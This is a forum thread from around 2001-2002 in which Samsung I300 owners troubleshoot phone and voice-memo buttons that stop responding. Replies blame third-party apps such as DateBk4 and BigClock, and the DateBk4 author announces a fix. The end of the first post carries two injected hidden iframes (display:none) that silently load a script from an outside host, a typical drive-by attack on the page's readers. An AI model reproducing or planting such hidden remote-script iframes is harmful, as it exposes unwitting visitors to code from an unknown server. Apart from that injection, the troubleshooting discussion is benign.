+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 22
  1. #1
    Registered User
    Join Date
    12-19-2001
    Posts
    37

    Exclamation Phone/Voice Memo buttons getting deactivated frequently !!

    Hi all,
    I recently purchased this phone and it works great except for the phone button and voice memo button getting deactivated (ie nothing happens when pressed ) frequently. Once I perform a soft-reset it starts to work again fine ,for few hours to atmost a day. I did a hard-reset too ,but the problem persisted .

    I finally returned the phone back and got a different phone,hoping the problem is just related to that handset, but I still experience the same problem .

    Any ideas/help,
    thanks

    -Thiru<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    When you returned the initial phone, did the rep have an idea as to what the defect was. To be honest with you, I haven't the slightest. Never encountered this on mine.

  3. #3
    Registered User
    Join Date
    12-19-2001
    Posts
    37
    Nope, he did not have any idea . We believed it was a defective piece . I called up Sprint support and he too did not have any idea and asked me to visit Sprint stores nearby. I am yet to go there.

    Now that the second phone also exhibits the same behaviour ( I had to do soft reset within a day of getting this phone) , I am wondering if this has got to do anything with the softwares I am loading from the net like dictionary,bigclock,Jungleport,SiverScreen etc or is it a bug .

    Will update after Sprint store visit.

  4. #4
    Registered User
    Join Date
    12-03-2001
    Posts
    63
    Are you using Datebk4? That is a known issue with that app.

  5. #5
    Registered User
    Join Date
    11-27-2001
    Location
    CT
    Posts
    25
    It's most likely one of the apps you're loading.

    As SammyT mentioned, Datebk4 is known for making some buttons stop working...

    I have BigClock, as well as others, so you can probably rule that one out.

    Unload them all, see if the problem persists. If not, then load up one App at a time to find the culprit.


    -Mk

  6. #6
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    seems if you have the same exact problem with this new phone, then its probably safe to say its an app you have reinstalled on the phone..

    do this...

    fry the brain (cold reset), the do not put any apps into it.. just use it as is from the factory for a day or so... see if you uhave the problem...

    i betcha the first phone was fine. you just had a bad app installed in it..

    also, if you are just resyncing the old DB to the new phone, you need to delete saved and unsaved prefs in the palm folder on the pc (or mac.. whatever you have)..

  7. #7
    Registered User
    Join Date
    11-24-2001
    Posts
    8
    My phone button would become disabled after a hotsync when using the Silver launcher software. Kinda sucked, so I don't use it anymore. Big Clock would also freeze the whole system when the alarm went off in the morning, so that's not much use either. Not sure what the conflicts are or how to get them resolved, but loading apps onto the I-300 reminds me of Windows 3.1!

  8. #8
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    You know my phone or memo buttons don't freeze exclusively but every now and then the entire unit may. I simply do a soft reset and don't think twice. Do any of the other functions work at these moments? Does the current screen operate?

  9. #9
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    for FYI, my phone to date has not (yet) behaved the way some of you have stated your phone does.. so i suspect its some bad apps on the phone... a lot of us were the first to get the first production runs of this phone and i would seem to think if one or two phones behaved this way, then they all would, but since mine is not having these issues, i suggest its a bad app...

    dont mean to press the issue, but just want to relay the thought that i don think its the phone per se... :p

  10. #10
    Registered User
    Join Date
    11-09-2001
    Location
    Tampa, FL
    Posts
    32
    The developer of DateBk4 is actively working on a patch to eliminate the DateBk4 / Samsung I300 incompatibility.

  11. #11
    Registered User
    Join Date
    12-19-2001
    Posts
    37
    I am not using DatBk4 . So far I have installed the following :

    Noah Lite dictionary
    Bigclock
    Blazer
    Worldnet Map
    JunglePort
    Handwrite
    Silverscreen
    Vindigo

    Its been a day since I did a soft reset on the 2nd phone and so far it has behaved Ok. If it happens again, I will remove all the software that I have installed and see what happens and progressively add software

  12. #12
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    I will remove all the software that I have installed and see what happens and progressively add software
    thats the best solution in this kind of case...

    ive heard (or seen rather) that silverscreen has caused some folks some problems....

  13. #13
    Registered User
    Join Date
    11-23-2001
    Location
    Chicago area
    Posts
    6

    Angry ALL MY BUTTONS HAVE DIED!!!!

    All of my buttons are now dead. I contacted my corporate Sprint Rep and she is working out a warrenty replacement.

    However, no level of soft or hard resets have helped. Even the hotsync button on the cradle doesn't work.

    To do a hotsync I have to disconnect the battery and reinstal it. Upon doing this the unit goes into hotsync mode and IF I place the unit in the cradle QUICKLY it will hotsync with my PC.

    The only time the buttons work is the VERY FIRST PRESS and then the unit will turn on. From that point on the buttons are disabled completely.

  14. #14
    Registered User
    Join Date
    01-06-2002
    Posts
    3
    I've had the exact same problem with my voice dial and phone buttons becoming deactivated everytime I hotsync. A soft reset will reactivate them, but what a pain. The only application we have in common is BIG Clock. I do have datebook4 installed. If there is fix to a known problem, I sure would like to know.

  15. #15
    Registered User
    Join Date
    12-19-2001
    Posts
    37
    I had removed Bigclock and Silverscreen few weeks back and so far no problem.

  16. #16
    Registered User
    Join Date
    01-04-2002
    Posts
    12
    I have Datebk4 and have not had any problems with any buttons getting deactivated. I do have an early version of Datebk4. Is this only an issue with Datebk4 4.0? If so, I guess I shouldn't upgrade yet???

  17. #17
    Registered User
    Join Date
    01-06-2002
    Posts
    3
    I have deleted Big Clock and I still am having problems. My Datebook version is 4.0, but it doesn't sound as if there is any confidence as to whether this is the culprit or not.

  18. #18
    Registered User
    Join Date
    01-04-2002
    Posts
    14
    I have the same problem.. phone button stops working, maybe after I run a specific app? I'm not sure....

    Matt

  19. #19
    Registered User
    Join Date
    11-09-2001
    Location
    Tampa, FL
    Posts
    32

    Thumbs up DateBk4 Fix

    Great news from the author of DateBk4:

    Just an FYI that I found this problem - SPH does not handle the Notification
    manager properly and ends up screwing things up. Fortunately, I can work
    around this problem. The very latest beta preview of V-4.1 of DateBk4 has
    this fix in it and several Samsung users have confirmed the problem has gone
    away. The final release of V-4.1 is a few weeks away. I may also release an
    updated V-4.0g with this fix as well.

    Cheers!
    CESD, Pimlico Software, Inc.

  20. #20
    RJS
    RJS is offline
    Registered User
    Join Date
    01-30-2002
    Location
    Chicago
    Posts
    37
    Ahhh That's it! I have Datebook 4.0c, S1 and the phone button freezes almost every time I hotsync. I was hoping that it was an app issue and not the phone. Hopefully they'll make a fix because I use DB4 more than any other application.



    Originally posted by SammyTerry
    Are you using Datebk4? That is a known issue with that app.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts